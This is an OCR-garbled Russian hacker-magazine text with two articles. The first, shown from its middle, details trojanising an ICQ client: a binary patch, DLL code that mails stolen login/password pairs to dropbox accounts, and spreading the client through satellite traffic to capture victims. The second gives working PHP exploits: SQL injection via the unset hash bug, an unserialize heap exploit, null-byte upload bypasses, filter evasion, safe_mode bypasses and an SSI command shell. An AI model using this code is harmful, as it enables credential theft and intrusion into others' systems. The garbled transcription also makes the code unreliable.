и еще несколько раз <Р8>, чтобы выйти из нее. В результате мы ока- 
зываемся по адресу 0х0064АЕ05. Чуть выше, по адресу 0х0064АОВ6, 
находится проверка, которая отвечает за вывод сообщения о нев- 
веденном пароле. Ставим на нее бряк (<Р2>) и возобновляем работу 
приложения (<Р9>). Еще раз пробуем подключиться, только уже в ка- 
честве пароля вводим «ЕезЕ 1 23», а в качестве номера — «123456789». 
Прерываемся на только что поставленном бряке и видим, что в стеке 
находится введенный нами пароль. По <Р8> пробираемся чуть дальше 
по коду до места 0х0064АЕС7. При этом у нас в стеке образовалась 
пара логин/пароль. 

Здесь мы будем внедрять свой код, поскольку у нас уже есть все инте- 
ресующие нас данные. Конечно, просто взять и изменить чужой код 
нельзя — программа будет работать некорректно. Поэтому нам нужно 
найти свободное место, где можно будет внедрить код для вызова 
нашей ОЕИ. Алгоритм следующий: по адресу 0х0064АЕС7 мы вставляем 
джамп на внедренный код по вызову ОИЕ, после выполнения которого 
возвращаемся обратно, предварительно выполнив затертые джампом 
инструкции. Для поиска свободного места нажимаем <С[гІ-В> и в каче- 
стве двоичной строки для поиска вводим «СЗ 00 00 00 00 00 00 00 00 00» 
и т.д. (СЗ — это команда ПЕТЫ). 

Найдены свободные участки по адресам 0x0041 0368 и 0х0052ЕАЕВ. Нам этого 
вполне достаточно. В первый участокмы поместим путькнашей ОЕЦРІидіпзѴ 
апбзрат.сіЩ, а во второй — код, отвечающий за ее загрузку. Можно приступать 
к модификации кода, но сначала запомним 3 команды, располагающиеся по 
адресу 0х0064АЕС7,таккакони будет затерты переходом на внедренный код. 
Это следующие команды: 



Переходим к модификации кода по адресу 0х0064АЕС7. Записываем в стек 
парулогин/пароль и идем по адресу 0х0052ЕАЕВ: 

0064АЕС7 РІІЗН БЖЖБ РТК 33: [ЕЗР+2С] ; Пароль 

0064АЕСВ РІІЗН БЖЖБ РТК 33: [Е5Р+28] ; Логин 

0064АЕСЕ ЛМР 0х0052ЕАЕВ 



По адресам 0x0041 0368 и 0х0052ЕВ21 записываем строчки «Р1идіпз\ 
апбзрат.сііі» и «ргосі» соответственно. По адресу 0х0052ЕАЕВ кладем 
следующий код: 



РІІЗН 0x00410368 
САЬЬ 00407854 
РІІЗН 0х0052ЕВ21 
РІІЗН ЕАХ 
САЬЬ 00401384 



; Адрес строки «Р1идіпз\апЬізраш. (111» 
; Вызов функции ЬоасІЬіЬгагу 
; Адрес строки «ргосі» 

; Хэндл загруженной библиотеки 
; Вызов функции СеЬРгосАббгезз 



САЬЬ ЕАХ ; Вызываем функцию ргосі, при этом 

; передаваемые ей параметры находятся 
; уже на вершине стека 



МОѴ ВУТЕ РТК БЗ: [ЕВХ+3 97] ,1 

; Выполняем поврежденные команды 



МОѴ ЕАХ, БЖЖБ РТК БЗ : [69С080] 

МОѴ ЕАХ , БЖЖБ РТК БЗ : [ЕАХ] 

АББ ЕЗР,8 ; Корректируем стек 

ЛМР 0х0064АЕБ5 ; Возвращаемся обратно 

Еще один штрих. Изменим информацию о билде, которая выводится при за- 
грузке приложения. Для этого поищем в коде константу 8020(1 Р54Ы («ПК-> 
БеагсЬ {ог-> СопзІапЫ- Команда, использующая эту константу, находится 
по адресу 0х006503АР. Меняем МОѴ ЕАХ, 1 Р54И на МОѴ ЕАХ, 235АИ. Теперь 
приложение полностью готово и его можно оставить в покое. Пришло 
время ОЕЕ. 0Е1_ содержит всего одну экспортируемую функцию ргосі , 
которая принимает 2 параметра и отправляет их на указанный почтовый 
ящик. Для отправки писем заведены 3 ящика: попатепопатеі йтаіі. 
ги, попатепопате2йтаі1.ги и попатепопатеЗйтаіЕги. 3 ящика 
нужны потому, что после отправки нескольких писем за очень короткое 
время ящик временно блокируется. В этом случае письмо отправляется 
с помощью другого ящика. Все письма с паролями будут приходить на 
четвертый ящик — попатепопатеаіійтаіі.ги. Сам процесс общения 
с 5МТР-сервером достаточно прост и выглядит следующим образом 
(пример отправки сообщения с использованием Іеіпеі представлен на 
одном из рисунков): 

1 . Здороваемся с сервером с помощью НЕЕО. В данном случае параметр 
команды значения не имеет. 
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Поиск свободного места 



Логин/пароль в стеке 



2. Авторизуемся (АІІТН ЬООІЫ], поскольку иначе письмо отправить не 
получится. 

3. Вводим свой логин, предварительно закодировав его с помощью 
ВА5Е64. 

4. Вводим свой пароль, также в ВА5Е64. 

5. Указываем отправителя (МАІ1_ ЕРОМ: попатепопатеійтаіі.ги). 

6. Указываем получателя (ПСРТТО: попатепопатеаіійтаіі.ги). 

7. Вводим команду йАТА. После ответа сервера вводим текст письма. 

8. Чтобы закончить ввод, нужно ввести «ЕпІег+».«+Епі:ег». 

9. Выходим (01ЛТ). 

ехбегп "С" ѵоісі САЬБВАСК ргосі (сЬаг *збг,с1іаг *збг2) 

{ 

Збгсру ( 1 , Збг) ; 

Збгсру (р, Збг2 ) ; 
іі Ыогкіпд ! =0 ) 

СгеабеТЬгеаб ( ШШ , 0 , ЗепбЕМаі 1 , ШШ , 0 , ШШ ) ; 

} 

БМОРБ ѴЛЫАРІ ЗепсіЕМаі 1 (БРѴОІБ ІрБаба) 

{ 

іпб ассШтЪег=0; 
ѵгогкіпд^О ; 

иМ 1е ( ассШшЬег<АСС_СОШТ ) 

{ 

ВООЬ АІІОК=бгие; 

ВУТЕ зВиб [4096] ; 

ЗОСКЕТ пЗМТРЗегѵегЗоскеб ; 

збгисб зоскаск1г_іп зтбр_а<Мгезз ; 

іи с пСоппесб; 

іпб ШепдбЬ; 

іпб іМзд = 0 ; 

іпб іЕпб = 0; 

скаг *МаіІМеззаде [ ] ={ 

"НЕБО гпаіі . ги\г\п" , 

"АБТН БОСШ\г\п" , 

ШББ, 

ШББ, 

ШББ, 

"РСРТ ТО: попашепопашеаІКішаіІ . ги\г\п" , 
"БАТА\г\п" , 

ШББ, 

"Схлт\г\п" , 

ШЬЬ} ; 

ШАБАТА мза; 

і г (ШАЗбагбир (МАКЕЖЖБ (2,0) , &ѵлза) ) 

{ 

ж>гкіпд=100 ; 

гебигп 0; 

} 



// Так как для отправки используется один из трех 
ящиков , то необходимо подготовить данные , которые будут 
отправлены ЗМТР- серверу 

МаіІМеззаде [2 ] = (сЬаг *) таііос (збгіеп (ассі [ассЫ 
ишЬег] .1) +2 ) ; //Выделяем место под логин 

збгсру (МаіІМеззаде [2 ] , ассі [ассЫшпЬег] .1) ; //Ко- 
пируем логин 

збгсаб (МаіІМеззаде [2 ] , " \г\п" ) ; 

МаіІМеззаде [3] = (сЬаг *)ша11ос (збгіеп (ассі [ассШш 
Ьег] . р) +2) ; //Выделяем место под пароль 

збгсру (МаіІМеззаде [3 ] , ассі [ассЫшпЬег] .р) ; //Ко- 
пируем пароль 

збгсаб (МаіІМеззаде [3 ] , " \г\п" ) ; 

МаіІМеззаде [4] = (сЬаг *)ша11ос (збг1еп(ассі [ассШгп 
Ьег] .шаіі) +2) ; //Выделяем место под адрес отправителя 
збгсру (МаіІМеззаде [4] , ассі [ассЫшпЬег] .шаіі);// 
Копируем адрес отправителя 

збгсаб (МаіІМеззаде [4] , " \г\п" ) ; 

МаіІМеззаде [7 ]= (сЬаг *) шаііос ( 
збгіеп(і) + збгіеп(р) + 11); 
збгсру (МаіІМеззаде [7 ] , 1) ; 
збгсаб (МаіІМеззаде [7 ] , " — ") ; 
збгсаб (МаіІМеззаде [7 ] , р) ; 
збгсаб (МаіІМеззаде [7] , " \г\п\г\п. \г\п" ) ; 

пЗМТРЗегѵегЗоскеб = 

зоскеб ( РР_ШЕТ, ЗОСК_ЗТВЕАМ, 0); 

И (пЗМТРЗегѵегЗоскеб [= ІЫѴАБІБ_ЗОСКЕТ) 

{ 

зтбр_аббгезз . зіп_баті1у = АЕ_ІЫЕТ; 
зтбр_абс1гезз . зіп_абсІг . з_абсІг - 

іпеб_ас!сІг ( "194.67.23.111"); //ИПшаіІ.ги 
зтбр_абс1гезз . зіп_рогб = Ьбопз (25) ; 
пСоппесб = соппесб (пЗМТРЗегѵегЗоскеб , 
(РЗОСКАББР) &зтбр_асІс1гезз , зігеоб (зшбр_ас1сІгезз) ) ; 
іб ( ! пСоппесб) 

{ 

бо 

{ 

іБепдбЬ = гесѵ( 

пЗМТРЗегѵегЗоскеб , 

(БРЗТК)зВиб + іЕпб, 
зігеоб (зВиб ) -ІЕпб, 0); 
іб ( (зВиб [ІЕпб] ) == ' 4 ' && 

(зВиб [іЕпб+1] ) == ' 0 ' && 

( зВиб [ іЕпб+2 ] ) == ' 3 ' ) 

{ //Если в ответ получили 403, то ящик 
для отправки временно заблокирован, поэтому используем 
следующий 

ассЫшпЬег++ ; 
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} 

іЕпсІ += іЬепдСЪ.; 

зВи:Е [іЕпсІ] = ' \ 0 ' ; 

зеінЭ. (пЗМТРЗегѵегЗоскеД , 

(ЬРЗТК.) МаіІМеззаде [іМзд] , 
зкгіеп (МаіІМеззаде [іМзд] ) , 0) ; 
іМзд++ ; 

} 

ѵЛііІо (МаіІМеззаде [іМзд] ) ; 

} 

сіозезоскек (пЗМТРЗегѵегЗоскеД) ; 
пЗМТРЗегѵегЗоскеЪ=ШЬЬ; 

} 

( АІІОК) Ьгеак; 

} 

ѵгогкіпд=100 ; 
геіигп 0; 

} 




Компилируем. Результат переименовываем в апіізрат.сііі и помещаем в каталог Ріидіпз. Называ- 
ем каталоге ОІР’ом, например, РогіаЫеОІР, чтобы заинтересовать рыбака, который поймает нашу 
наживку. Архивируем нашетворение и переходим кследующему пункту плана. 

^ РАСПРОСТРАНЯЕМ НАЖИВКУ 

Поскольку для распространения мы решили использовать спутниковую рыбалку, необходимо остано- 
виться на этом процессе поподробнее. Конечно, рыбалка сейчасуже нета, что была раньше... Сейчас 
многие провайдеры переходят на новое ПО, которое не передает данные в открытом виде, а применяет 
шифрование. Но все нетакплохо. Например, на 5ку05І_ треть трафика все еще не шифруется. Поэтому 
мы будем использовать именно его. Для этого нам понадобится залить файл на какой-нибудь сервер 
(например, Ѵапбех] и скачать его несколько раз с помощью ПО, не использующего шифрование. Можно 
также запустить зкупеі (ПО для рыбалки) и убедиться, что наш Рог1:аЫеОІР действительно ловится. 

Все, теперь от нас ничего не зависит. Можно ждать поклевки :). 

^ ВЗВЕШИВАЕМ УЛОВ 

Спустя пару часов проверяем снасти и обнаруживаем, что наша наживка была проглочена 1 5 раз. Для 
того чтобы письма приходили чаще, необходимо регулярно копировать приложение, тем самым давая 
народу возможность его поймать и запустить. Конечно же, лучшее время для рыбалки — это выходные. 

В выходные количество халявщиков увеличивается, поскольку улов действительно приличный. Это и 
новинки видео, и музыка, и книги, и еще много всего интересного :]. 

^ КОНЕЦ 

Самое смешное то, что один из рыбаковтеперь постоянно пользуется этой новой версией ОІР’а, в ре- 
зультате чего на ящик регулярно приходят пароли отегоаси. В качестве оправдания хочу отметить, что 
ни одна из асек не пострадала, равно как и их пользователи. Статья написана лишь в ознакомительных 
целях. Какты знаешь, распространениетроянов является наказуемым деянием. Поэтому мы ничего и 
не распространяли, а всего лишь пару раз скачали приложение на свой компьютер :1. т 
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РОКОВЫЕ 
ОШИБКИ РНР 



НЕБЕЗОПАСНОЕ ВЕБ-ПРОГРАММИРОВАНИЕ 



Становится все тяжелее и тяжелее находить уязвимости типа 3^^-іп^ес1:іоп, РНР-іпсІшіе 
или Х53-а1Таск. Разработчики различных систем контроля контента, форумов, шопов и 
т.п. стали на порядок серьезнее относиться к безопасности своих скриптов. Однако хаке- 
ры — люди неглупые, поэтому стали искать баги не в огромной куче генерируемого шеЪ- 
программистами кода, а в интерпретаторе, на котором этот код выполняется. И, надо 
признать, получилось у них это неплохо. За последние несколько лет найдено уже около 
50 ошибок в самом РНР. Как в стандартных функциях обработки, так и в дополнительных 
расширениях. В это статье я покажу лишь пару самых основных уязвимостей, чтобы про- 
демонстрировать общий принцип их эксплуатации. 



Н КЕСІ5ТЕК 6І.0ВАІ.5 

Одной из самых опасныхуязвимостей в веб-приложениях по-прежнему 
остается перезапись глобальных переменных, которая может привести 
к разным последствиям — начиная от раскрытия пути и заканчивая уда- 
ленным выполнением кода. Однако еще с четвертой ветки РНР появилась 
возможность отключить регистрацию глобальных переменных путем извле- 
чения данных из 6ЕТ-, Р05Т-, СООКІЕ-массивов. 

Рассмотрим классический пример дІоЬаІ оѵегѵѵгііе, создав простой РНР- 
скриптсо всего лишь одной строчкой кода: 

есЬо $СШВАЬ5 [ ' ехатріе 1 ] ; 

Для присвоения данных переменной достаточно обратиться кскрипту с 
параметром ехатр1е=апбсЬа!: 1 в результате мы увидим высвеченное зна- 
чение апбсбаЕ Некорректно обрабатывать обнуление переменныхтолько 



из 6ЕТ/Р05Т-массивов. Передав дополнительный заголовокбраузера, мы 
получим тот же самый результат: 

Соокіе: ехашр1е=апЬіс1іа1: 

^ РІІ_Е 6І_0ВАІ_ ОѴЕКѴѴКІТЕ 

Недавно лучшие умы из НагбепесІ-РНР опубликовали описание нового 
способа перезаписи значения переменной с использованием загрузки 
файла. Метод основывается на том, что РІІ_Е5 является частью масси- 
ва _Р05Т. Для начала напишем скрипт отправки и приема загружен- 
ных файлов. 

сЕогсп теЫіос1= "розЦ " ас^іоп= " ехатріе . РНР" 
епсосіе="ти1кірагР/богт-сІа1:а" > 

<іприЬ Цуре= " бііе" пате=" ехатріе" /хіприЪ 
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Сегментпамяти в РНР 



^УРе="8иЪтіЬ" пате="зиЪтіІ:'' /></Еогт> 

<?РНР 

іі (іззеі: ($_РІЬЕЗ [ "ехатріе" ] ) ) { 

сору ( $_РІЬЕЗ [ " Тііепате " ] [ " Ьтр_пате 

} 

есііо $СЬОВАЬЗ [ ' ехатріе ' ] ; 

?> 

Пробуем залить файл с именем апіісбаі.іхі и видим в качестве результата 
не только залитый файл, но и присвоенное переменной ехатріе значение 
апіісбаі. Удивлен? Но это еще цветочки! 

^ СІ_0ВАІ_5 ОѴЕКѴѴВІТЕ 

Поскольку большинство систем работаеттолько с включенным режимом 
гедІ5Іег_дІоЬаІ5, а многие веб-хостинги с целью обеспечения безопасно- 
сти своих клиентов отключают эту переменную, программисты придумали 
пару методов для помещения переменных в область глобального видения, 
которые в реализации гораздо легче, чем изготовление патчей. Одной из 
таких функций является ітрогІ_гедие5І_ѵагіаЫез. В качестве параметра 
выступает строка, определяющая порядокпомещения переменных в 
эирегдІоЬаІ из массива _ПЕ00Е5Т. Небезопасное использование функции 
позволяет перезаписать произвольные переменные, пришедшие с кли- 
ентской стороны. Стоит использовать ітрогІ_гедие5І_ѵагіаЫез вместе со 
вторым параметром — префиксом будущих функций. Несмотря на то что баг 
обнаружен в 2005 году, ему не было присвоено критическое значение. 

ішрог^_гедиезЬ_ѵагіаЫез ( "СРС" ) ; 

Обратившись к скрипту с параметром _5ЕНѴЕН[ВЕМ0ТЕ_А00Н]=апІісЬаІ, 
мы перезапишем ключ массива, содержащий в себе адрес посетителя, а так 
как многие системы управления контентом не фильтруют этот, на первый 
взгляд, безопасный параметр, рождается куча способов атаки: отснятия 
блокировки на сайте до выполнения произвольного 50І_-кода. 

Вторая не менее опасная и распространенная функция для эмуляции 
гедІ5Іег_дІоЬаІ5 — ехігасі. Чтобы избежать перезаписи уже существующих 
переменных, рекомендуется использовать флаг ЕХТР 5КІ Р, который при 
попытке поместить переменную в глобальное окружение проверит ключ на 
существование и лишь в случае отсутствия в адресном пространстве такого 
ключа создаст его. 

ехСгасЪ ( $_КЕ(2иЕ5Т) ; 

^ (Ж5ЕТЖНАСКШ6 

Обнаруженная в конце 2006 года и уже успевшая стать популярной уязви- 
мость в вызываемой функции ипзеі, изначально именуемой 2епб_На5Ь_ 
ОеІ_Кеу_Ог_І псіех, достойна отдельного внимания. Ровно 6 месяцев ушло 
у авторов РНР на устранение этой критический уязвимости. Для того чтобы 
лучше уяснить суть бага, надо понять основы хранения данных в РНР. 



2епб Епдіпе НазбТаЫез является контейнером для информации, посту- 
пившей со стороны клиента, такой как суперглобальные массивы С00К1Е, 
Р05Т, 6ЕТ. НазЬТаЫе хранит ключ и -указатели на содержимое переменных 
и, какоказалось, несетв себе критический баг: подставив цифровое значе- 
ние переменной, можно перезаписать буквенно-цифровое представление. 
Такиеуязвимости могутбыть проэксплуатированы только в случае вклю- 
ченного потенциально опасного параметра гедізІег_дІоЬаІз в настройках 
РНР. Хэш-таблицы 2епб Епдіпе знают два типа индексов в РНР4: цифровые 
и буквенно-цифровые. Если индекс состоиттолько из цифр, он автомати- 
чески обрабатывается как цифровой. В РНР5 это нетак, поскольку РНР5 
знаетотаблицах имен и о простых хэш-таблицах. Втаблицах имен цифро- 
вые индексы все еще обрабатываются автоматически. 

Брешьзаключается в некорректном условии проверки: если мы пытаемся 
вызвать ипзеі для буквенно-цифровой переменной и в списке переменных 
есть цифровой хэш-ключ с идентичным значением, то РНР удалит ключ, но 
не саму переменную. То есть после вызова ипзеі мы можем использовать 
значение в дальнейшем. Для нас является положительным тот фа кт, что 
ипзеі чаще всего используется в начале кода, для того чтобы принудитель- 
но запретить использование опасных ключей. 

Указать ключ переменной можно нетолько при включенном зирегдіобаіз 
тобе, но и упомянув значение в массиве _РІІ_Е5, о чем я писал выше. Так 
был написан эксплойт для форумного скрипта ѵВиІІеІіп и популярного блог- 
движка ѴѴогбРгезз. 

Рассмотрим реализацию на примере АіахСбаІ, последнюю версию которого 
можно взять с аісбаі.зоигсеіогае.пеі . Авторы этого чата позволяют созда- 
вать виртуальные комнаты, состоящие только из букв, что явно видно в этом 
участке кода: 

ІТ (іззеб ($_СЕТ [ "з" ] ) ) { 

$_СЕТ [ " з " ] = збгСоиррег ( $_СЕТ [ " з " ] ) ; 

ІТ ( зЬгІеп ( $_СЕТ [ " з " ] ) ==1 && $_СЕТ [ " з " ] >- ' А ' && 
$_СЕТ["б"]<=’2') {) 
еізе ипзеС ( $_СЕТ [ ' з ' ] ) ; 

} 

Если переменная "з" из массива_6ЕТ прошла фильтрацию, то в системе 
выполнится следующий запрос: 

ЗЕЬЕСТ ' гоотпате ' , ' ирсіа^есі ' РКОМ ' гоотз ' ШЕКЕ ' гоотпате ' 

ЫКЕ ' %$з% ' АЫБ 'ир^а^ей' > 0 ОКБЕК. ВУ 'гоотпате' АЗС ; 

С первого взгляда кажется, что код правильный, но на самом деле нужно 
лишь переопределить переменную "з", идущую в 6ЕТ-запросе, чтобы 
выполнить произвольный 50І_-запрос. Высчитаем ЬазЬ_беІ_кеу для обоих 
версий РНР. 

РНР5 ЬазЪ: 5863704, РНР4 Ь.азЬ: 5861526 

Длятого чтобы хэш переменной засчитался, сначала надо присвоить саму 
переменную и только после этого делать подстановку наших ключей. Наш 
запрос для извлечения юзеров принимает следующий вид: 

сІігесЪогу .РНР?з= ' апсі 1=2 ипіоп зеІесЬ сопсаб_ѵ73 (сЬаг ( 

59) , ісДизегпате ,раззѵгогсІ, етаіі) ,пи11 + бгот+ас_изегз/* 

&5861526=1&5 863704=1 

Прерывая одинарной кавычкой оригинальный запрос, мы вставляем 
выборку полей с номером, именем, паролем и почтовым адресом юзера, 
объединенных с помощью функции сопсаІ_\л/з, в результате чего получаем 
нужные данные. Такой же опыт можно провести, совместив аплоад файла и 
ипзеі Ьид. Модифицируем код, где 1322199023 и 1 1 54731405 - хэш-ключи 
переменной ехатріе сразу для двух версий РНР: четвертой и пятой. 

<Тогт те1:Ъ.осЗ.= "розі: " асЬіоп=" ехатріе. РНР" 

епсосІе= "тцІЪірагЪ/іот-сІаЪа" > 

сіприі: Ьуре="Ті1е" пате=" ехатріе" /> 
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сіприб буре="зиЬтіб" пате="зиЪтіб " /> 
сіприб буре="бі1е" пате="1322199023 " /> 
сіприб буре=" бііе" пате="1154731405 " /> 

</богт> 

<?РНР 

іб (іззеб ($_РІЬЕ8 [ "ехатріе" ] ) ) { 
ипзеб ( $_ЕІЬЕ5 [ " ехатріе " ) ; 

} 

есЪо $СЬОВАЬЗ [ ' ехатріе ' ] ; 

?> 

После загрузки файла апбсЬабМ мы все равно увидим значение перемен- 
ной ехатріе. 

^ 1Ж0ЕКЖНАТ71Ж0ЕК5ЕШАІ-І2Е 

РНР-функция ип/зегіаІІ 2 е используется для помещения данных в строку, 
представляющую собой сериализованный массив. Часто его используют для 
упрощения структуры хранения соокіе-данных юзера. В различных версиях 
интерпретатора существовало не менее пяти багов в этой функции: от баналь- 
ного переполнения буфера до получения нужной информации. На основе 
этой бреши для РНРЬЬ2 был написан эксплойт, представляющий собой очень 
длинную строку, посылаемую разбитой на несколько частей в заголовке соокіе, 
предварительно закодированную в 0Р1_-представлении. Большое количество 
вложенных сериализированных массивов можетзапросто подвесить РНР-ин- 
терпретатор. Впоследствии это переросло в іпіедегоѵегііоѵѵ в вызове функции 
есаііос. В таком случае памяти выделяется куда больше, чем было выделено 
подоперацию, обратную сериализации, что приводиткисполнению кода, 
послетого как переменная будетудалена из 4епсІ НазЫаЫе. 

$збг = ' 3 (100*3 збг_гереаб (' \61 ' , 100 
ипзегіаііге ( $зЬг) ; 

Эксплойт для 1_іпих, где адрес 0x08064058 является свободным для РНР, 
выглядит так: 

$Ьаз1і1:аЫе = збг_гереаб ( "А" # 39) ; 

$Ьаз1іДаЫе [5*4+0] =с1іг (0x58) ; 

$Ъаз]ібаЫе [5*4 + 1] =с1іг (0x40) ; 

$Ъаз]ібаЫе [5*4+2 ] =сЪ.г ( 0x06 ) ; 

$Ъаз]ібаЫе [5*4+3 ] =с1іг ( 0x08 ) ; 

$Ьаз]ібаЫе [8*4+0] =с1іг (Охбб) ; 

$Ъаз]ібаЫе [8*4 + 1] =сЪ.г (0x77) ; 

$1іаз]іі:аЫе [8*4+2 ] =с1іг ( 0x88 ) ; 

$1іаз]іі:аЫе [8*4+3 ] =с1іг ( 0x99 ) ; 

$збг = ' а: 100000: (з:8: " ААААВВВВ " ; а : 3 : {з : 12 012345678 
9АА" ; а : 1 : { 3 : 12 : " ААААВВВВСССС " ;і:0; }з:12: " 012345678АА 
А" ;і:0;3:12: "012345б78ВАЫ";і:0; } ' ; 

бог ($і=0; $І<65535; $і++) { 

$збг . = ' і : 0 ;К: 2 ; ' ; 

} 

$ збг . — ' з : 3 9 : " ХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХ 
X" ; з : 3 9 : " ' . $1іазЫ:аЫе . ' " ; і : 0 ; К : 3 ; ' ; 

ипзегіаііге ( $збг) ; 

Полученный результат нужно использовать как аргумент при использова- 
нии ипзегіаіііе. 

^ 5РЕСІАІ. СНАР5 

Использование специальных непечатаемых символов в качестве аргу- 
ментов, передаваемых функции, часто приводит к очень «радостным» 




результатам. Например, прежде чем поместить ІР-адрес в базу данных, его 
часто проверяют функцией ір21опд, которая, в случае если адрес является 
неправильно сформированным, вернет -1 . 

ір21опд ( 423.231.222.111" ' ) ; 1 

Однако, немного помучив функцию, мы можем увидеть, что строка, содер- 
жащая в себе символы, коды которых равны 0,9,10,1 1,12,13либо32, вернет 
неотрицательный результат. 

бог ($і=0; $і<=255; $і++) { 

есЬо $ і . " : " . ір2 Іопд ( " 1 . 1 . 1 . 1 " . сЪх ( $ і ) . " ' ог ' а ' = 1 а ' / 

*" ) . " \г\п" ; 

} 

На примере тіпіЬЬ взлом будет выглядеть так: 

Х-ЕОЕМАЕБЕБ-ЕОЕ: 1 . 1 . 1 . 1 [СНЕ ( 0 ) ] ' ипіоп зеіесб 1 

Хотя использование нашего 5СН_-запроса является неудобным (потребу- 
ются специальные программы, чтобы отправить заголовок), мы находимся 
в выигрыше: тадіс_дио1:е5_дрс не распространяется на этоттип данных. 

К сожалению, в тіпіЬЬ провести атаку не получится: на строку выделя- 
ется всего 1 6 символов плюс один наш символ. Функция из пакета ббу 
бі сіу ра гзе збгі п д , каки обратная ей — бісіу гераіг збгіпд, при локальном 
использовании позволяет переполнить буфер с последующим выполнени- 
ем шелл-кода. Этот набор функций часто используется в ѵѵікі-скриптах. 

бі(іу_рагзе_збгіпд ( 1 , збг_гереаб ( "А" ,2036) . и \х8В\х51\ 
х81\х7С" . збг_гереаб ( " \х90 " ,12 ) . $з1іе11сосіе , 1 ) ; 

Очень серьезной является ошибка в функциях сору и тоѵе_ирІоас!есІ_[іІе. 
Существуют символы, которые о б рубают стр оку- аргумент до вхождения 
этого символа. Обычно это пиІІ-Ьубе, а в некоторых *піх-системах и слеши. 

$бі1епате = бгіт( $бі1еіпбо [ ' пате 1 ] , " \х00 . . \х1Р" ) ; 

Напишем скрипт, ничуть не отличающийся от множества используемых для 
аплоада файла с проверкой расширения. 

<?РНР 

$бі1епате = $_ЕІЬЕ5 [ ' изегбііе ' ] [ ' пате ' ] ; 

$а11оѵ^е(і = аггау ( ' діб ' , ’рпд 1 , ' зрд ' ) ; 

$бтрпате = ехріойе ( ' . ' , $бі1епате) ; 

$ехбепзіоп = $бтрпате [соипб ( $бтрпате) -1] ; 

$а11оѵ^е(і = іп_аггау ( $ехбепзіоп, $а11оѵ?есі) ? 

бгие : баізе ; 
іб ($а11сжесІ) { 

тоѵе_ир1оа(1е(3_бі1е ( $_ЕІЬЕЗ [ ' изегбііе ' ] [ ' бтр_ 
пате' ] , $ир1оасібі1е) ; 
есЬо ’иріоасіесі! ' ; 



► 064 
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} еізе { 

есію ' аааЬ поооо ! ' ; 

} 

?> 

сіогтп епсЪуре="тиІЪіраг*:/:Еогт-сІа{:а" асДіоп="1:езі: . 

РНР" теб1іо(і= "розД " >Отправить этот файл: <іприД 
пате="изег1:і1е" Буре= " іііе" /><іприѣ Буре= " зиЪтіС " 
ѵа1ие="5епсі Рііе" /></ііогт> 

На первый взгляд, вполне очевидно, что файл с именем бІедрд.РНР не 
пройдет проверку, однако попробуем вставить пиІІ-ЬуІе в имя файла, и в 
итоге получится что-то вроде ту_ба1:а.РНР%00.]рд. Если повезет, то наш 
файл зальется с именем ту_ба{а.РНР. Такой же баг присутствует и в функ- 
ции сору(). 

Моб_5есиігі1:у, часто устанавливаемый вместе с Апачем, тоже имеетуязви- 
мости. Внедрив пиІІ-ЬуТе в Р05Т-заголовок, мы обманем фильтр и не оста- 
вим в логах никаких записей, поскольку Ю5 посчитает%00 концом строки: 

сигі ЬДДр : //ІосаНіозб/ДезД . РНР --сіаДа-Ъіпагу @ 
розбйаТа -А НагшІеззІІзегАдепІ: <зсгірД>а1ег1: ( /хзз/ ) ;</ 
зсгірр> 

Для облегчения труда был написан комплекс скриптов для тестирования 
функций на предмет переполнения буфера в передаваемых аргументах. 
Одна часть скрипта получаетсписок всевозможных функций и запускает 
второй скрипт, функцию по имени аргумента и логирующий каждую ошибку. 

^ ВАЗЕ 01 К && БАРЕ МОРЕ 

Защищенный режим в РНР — это попытка решить проблему безопасности 
на совместно используемых серверах. Несмотря на то что концептуально 
неверно решать эту проблему на уровне РНР, но поскольку альтернативы 
уровня веб-сервера или операционной системы на сегодняшний день 
отсутствуют, многие пользователи, особенно провайдеры, используют 
именно защищенный режим. Для управления 5а1е_тобе в файле настроек 
РНР имеется несколько директив, определяющих поведение безопасного 
режима: 

за^е_тосіе — включает/отключаетзащищенный режим; 
за^е_тосіе_дісІ — определяет доступ кскрипту по иісі вызывающего его 
юзера; 

за^е тосіе іпсіисіе сііг — разрешает подключение файлов только из опреде- 

ленной директории; 

5а^е_тобе_ехес_біг — разрешает выполнение команд оболочки только в 
определенной директории; 

5а^е_тобе_аІІо\л/еб_епѵ_ѵаг5 — разрешает модификацию переменных, 
имеющих в названии определенную приставку; 

5а^е_тобе_рго1:есІеб_епѵ_ѵаг5 — запрещает модификацию переменных при 
любом раскладе; 

ореп_Ьазебіг — ограничиваетсписокфайлов и директорий на чтение, не 

влияет на состояние режима ва^тобе; 

бІ5аЫе_{ипсІіоп5— запрещает выполнение функций из списка. 

В случае открытия файла, права на который не совпадаютс правами юзера, 
будет выдана ошибка: 

еггог -> Магпіпд: ЗАРЕ МОБЕ КезбгісБіоп іп еііесБ. ТЪе 
зсгірС мЪозе иісі із 500 із поД аіісжесі До ассезз /еДс/ 



раззѵмі 

оѵтесі Ьу иісі 0 іп /сіосгооД/зсгірД . РНР оп Ііпе 2 

Тотже самый эффект мы наблюдаем и с Ьазе_біг: 

еггог -> Магпіпд: ореп_Ьазесііг гезДгісДіоп іп еібесД. 

Рііе із іп тогопд сіігесДогу іп /сіосгооб/ зсгірД . РНР оп 
Ііпе 2 

К сожалению, а может, и к счастью, ваіе тобе уже научились обходить, 
причем способом куча, и редко встретишь сервер, где не работает ни один. 
Например, одним из последних способов обмануть Ьазе_біг является 
принудительное выставление 5е55Іоп.заѵе_раІб в директорию, доступную 
на чтение. 

іпі_зеД ( " зеззіоп. заѵе_раДіі" , " / зеззіопз/изег2/ " ) ; 
риДепѵ ( "ТМРБІК=/зеззіопз/изег2/ " ) ; 
іпі_зеД ( " зеззіоп. заѵе_раДІі" , " " ) ; 

@зеззіоп_зДагД ( ) ; 

Использование префиксов «сотрге55.Ьгір2://» и « 2 Ір://» неучитывается в 
заіе тобе, что позволяет читать файлы вне разрешенных директорий. Ло- 
гично, что действие заіе тобе распространяется только на РНР-скрипты, и 
мы можем заюзать Регі, РуЛіоп или 551 (5егѵег5ібе I псіибез) . Для того чтобы 
последний метод заработал, надо выставить в Апаче некоторые параметры 
запуска для файла .Ыассезз: 

АсісіТуре ДехД/Ь.Дш1 . зііДшІ 
АсісІНапсІІег зегѵег-рагзесі. зЬДшІ 
ОрДіопз +Іпс1исіез 

И для того чтобы удобнее было использовать все сделанное, напишем 
своеобразный шелл на іаѵа5сгірЕ 

іипсДіоп ехесиДе ( ) { 

ѵаг сшсі - (іосишепД . ехес . сшсі. ѵаіие; 

(іосишепД .шгіДе ( ' <ЬБт1><ЪосІу>< ! --#ехес 
ст<і= " 1 +сш(і+ ' " --></Ьоб.ух/Ь.Дш1> 1 ) ; 

} 

